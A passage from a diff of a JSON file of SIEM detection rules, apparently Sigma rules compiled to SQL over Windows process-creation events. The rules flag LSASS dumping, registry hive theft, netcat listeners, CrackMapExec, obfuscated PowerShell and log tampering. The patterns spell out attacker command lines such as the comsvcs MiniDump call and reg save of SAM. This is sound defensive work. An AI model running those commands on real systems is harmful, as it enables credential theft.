AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_hktl_createminidump.yml" }, { - "title": "PowerShell Base64 Encoded 
FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", - "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "title": "Phishing Pattern ISO in Archive", + "id": "fcdf69e5-a3d3-452a-9724-26f2308bf2b1", + "status": "experimental", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1566" ], "falsepositives": [ - "Unknown" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\Winrar.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\peazip.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\isoburn.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerISO.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ImgBurn.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": 
"proc_creation_win_susp_archiver_iso_phishing.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", + "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", + "author": "pH-T (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1059.001", + "attack.t1027" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR 
CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "PowerShell Get-Process LSASS", + "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE 
'\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_powershell_getprocess_lsass.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Renamed Msdt.EXE Execution", + "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "status": "experimental", + "description": "Detects the execution of a renamed \"Msdt.exe\" binary", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND 
ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'msdt.exe' AND NOT (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_renamed_msdt.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "HackTool - CrackMapExec Process Patterns", + "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? 
\\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove 
forensic evidence", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", + "status": "experimental", + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program 
Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", + "tags": [ + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_mssql_susp_child_process.yml" + }, + { + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur 
Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Detects command line parameters used by 
Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate ncat use" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR 